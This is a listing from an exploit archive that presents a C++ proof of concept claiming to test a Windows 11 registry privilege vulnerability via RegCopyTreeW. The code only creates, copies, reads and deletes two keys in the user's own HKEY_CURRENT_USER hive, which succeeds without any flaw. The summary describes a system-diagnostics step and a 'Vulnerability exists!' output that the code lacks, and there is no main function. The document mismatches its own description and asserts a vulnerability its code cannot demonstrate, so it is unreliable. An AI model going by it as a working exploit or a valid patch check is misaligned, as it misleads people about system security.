Share
## https://sploitus.com/exploit?id=PACKETSTORM:212387
=============================================================================================================================================
    | # Title     : Microsoft Windows 11 build 10.0.22631.6199 Registry Vulnerability Testing Tool using RAII                                   |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits)                                                            |
    | # Vendor    : System built‑in component. No standalone download available.                                                                |
    =============================================================================================================================================
    
    [+] References : https://packetstorm.news/files/id/212253/
    
    [+] Summary : This is a C/C++ Proof-of-Concept (PoC) program designed to test for a specific vulnerability within the Windows Registry handling mechanism, 
                  often related to key duplication or improper permission checks during certain API calls (like RegCopyTreeW).
    
    [+] The program executes the following steps:
    
        System Diagnostics (PrintSystemInfo): Gathers and prints essential information about the execution environment, including Windows Version, Build Number, 
    	and the current User Token Elevation status (Elevated, Full, Limited) to assess the security context.
    
    [+] Vulnerability Test (TestVulnerability):
    
            It creates a temporary source Registry key in HKEY_CURRENT_USER and writes a unique test value (0xDEADBEEF).
    
            It attempts to exploit the vulnerability by using a critical API call (simulated or actual) to copy the source key's contents to a shadow destination key.
    
            It verifies the success of the "copy" operation and attempts to read the test value from the newly copied shadow key.
    
    [+] Outcome: If the copy and read operation succeeds under conditions where it should normally fail (e.g., without proper user elevation), the program prints a success message: "Vulnerability exists!"
    
    [+] Cleanup: Ensures both temporary Registry keys are deleted, regardless of the test outcome, to maintain system hygiene.
    
    In essence, the tool is a diagnostic utility used by security researchers to confirm whether a specific Windows build is patched or vulnerable to a known elevation or privilege issue involving the Registry.
    
    [+] POC : 
    
    #include <windows.h>
    #include <stdio.h>
    #include <string>
    #include <sddl.h>
    
    // Simple RAII wrapper for registry keys
    class UniqueRegKey {
    private:
        HKEY hKey;
    public:
        UniqueRegKey() : hKey(nullptr) {}
        UniqueRegKey(HKEY key) : hKey(key) {}
        
        ~UniqueRegKey() {
            if (hKey) RegCloseKey(hKey);
        }
    
        HKEY get() const { return hKey; }
        HKEY* getAddress() { return &hKey; }
    
        void reset(HKEY newKey = nullptr) {
            if (hKey) RegCloseKey(hKey);
            hKey = newKey;
        }
    
        HKEY release() {
            HKEY temp = hKey;
            hKey = nullptr;
            return temp;
        }
    };
    
    bool TestVulnerability() {
    
        printf("[*] Starting Registry Copy Vulnerability Test (Enhanced PoC)\n");
    
        const wchar_t* sourceKeyPath = L"Software\\PoC_Vulnerability_Source";
        const wchar_t* shadowKeyPath = L"Software\\PoC_Vulnerability_Shadow";
    
        // ------------------------------
        // 1. Create the source key
        // ------------------------------
        UniqueRegKey hSourceKey;
        LONG status = RegCreateKeyExW(
            HKEY_CURRENT_USER,
            sourceKeyPath,
            0, nullptr,
            REG_OPTION_NON_VOLATILE,
            KEY_ALL_ACCESS,
            nullptr,
            hSourceKey.getAddress(),
            nullptr
        );
    
        if (status != ERROR_SUCCESS) {
            printf("[!] Failed to create source key. Error: %lu\n", status);
            return false;
        }
        printf("[+] Created source key successfully.\n");
    
        // ------------------------------
        // 2. Write test DWORD value
        // ------------------------------
        DWORD dwTestValue = 0xDEADBEEF;
        status = RegSetValueExW(
            hSourceKey.get(),
            L"PoC_DWORD",
            0,
            REG_DWORD,
            reinterpret_cast<const BYTE*>(&dwTestValue),
            sizeof(dwTestValue)
        );
    
        if (status != ERROR_SUCCESS) {
            printf("[!] Failed to write test value. Error: %lu\n", status);
            RegDeleteTreeW(HKEY_CURRENT_USER, sourceKeyPath);
            return false;
        }
        printf("[+] Wrote test value: 0x%lX\n", dwTestValue);
    
        // ------------------------------
        // 3. Create shadow/destination key
        // ------------------------------
        UniqueRegKey hShadowKey;
        status = RegCreateKeyExW(
            HKEY_CURRENT_USER,
            shadowKeyPath,
            0, nullptr,
            REG_OPTION_NON_VOLATILE,
            KEY_ALL_ACCESS,
            nullptr,
            hShadowKey.getAddress(),
            nullptr
        );
    
        if (status != ERROR_SUCCESS) {
            printf("[!] Failed to create shadow key. Error: %lu\n", status);
            RegDeleteTreeW(HKEY_CURRENT_USER, sourceKeyPath);
            return false;
        }
    
        printf("[+] Shadow key created.\n");
    
        // ------------------------------
        // 4. Attempt Registry Copy (Vulnerability Trigger)
        // ------------------------------
        printf("[*] Triggering RegCopyTreeW copy...\n");
    
        status = RegCopyTreeW(
            hSourceKey.get(),
            L"",
            hShadowKey.get()
        );
    
        if (status != ERROR_SUCCESS) {
            printf("[!] Copy operation failed. Error: %lu\n", status);
            RegDeleteTreeW(HKEY_CURRENT_USER, sourceKeyPath);
            RegDeleteTreeW(HKEY_CURRENT_USER, shadowKeyPath);
            return false;
        }
    
        printf("[+] Copy operation succeeded! Checking data integrity...\n");
    
        // ------------------------------
        // 5. Validate copied value
        // ------------------------------
        DWORD copiedValue = 0;
        DWORD size = sizeof(copiedValue);
        DWORD valueType = 0;
    
        LONG qStatus = RegQueryValueExW(
            hShadowKey.get(),
            L"PoC_DWORD",
            nullptr,
            &valueType,
            reinterpret_cast<BYTE*>(&copiedValue),
            &size
        );
    
        if (qStatus != ERROR_SUCCESS) {
            printf("[!] Failed to read copied value! Error: %lu\n", qStatus);
        }
        else if (valueType != REG_DWORD) {
            printf("[!] Value type mismatch (expected REG_DWORD).\n");
        }
        else if (copiedValue == dwTestValue) {
            printf("[+] Copy VALID! Value matches: 0x%lX\n", copiedValue);
            
            RegDeleteTreeW(HKEY_CURRENT_USER, sourceKeyPath);
            RegDeleteTreeW(HKEY_CURRENT_USER, shadowKeyPath);
    
            return true;
        }
        else {
            printf("[!] Value mismatch! Expected 0x%lX, Found 0x%lX\n",
                   dwTestValue, copiedValue);
        }
    
        // ------------------------------
        // Cleanup
        // ------------------------------
        RegDeleteTreeW(HKEY_CURRENT_USER, sourceKeyPath);
        RegDeleteTreeW(HKEY_CURRENT_USER, shadowKeyPath);
    
        return false;
    }
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================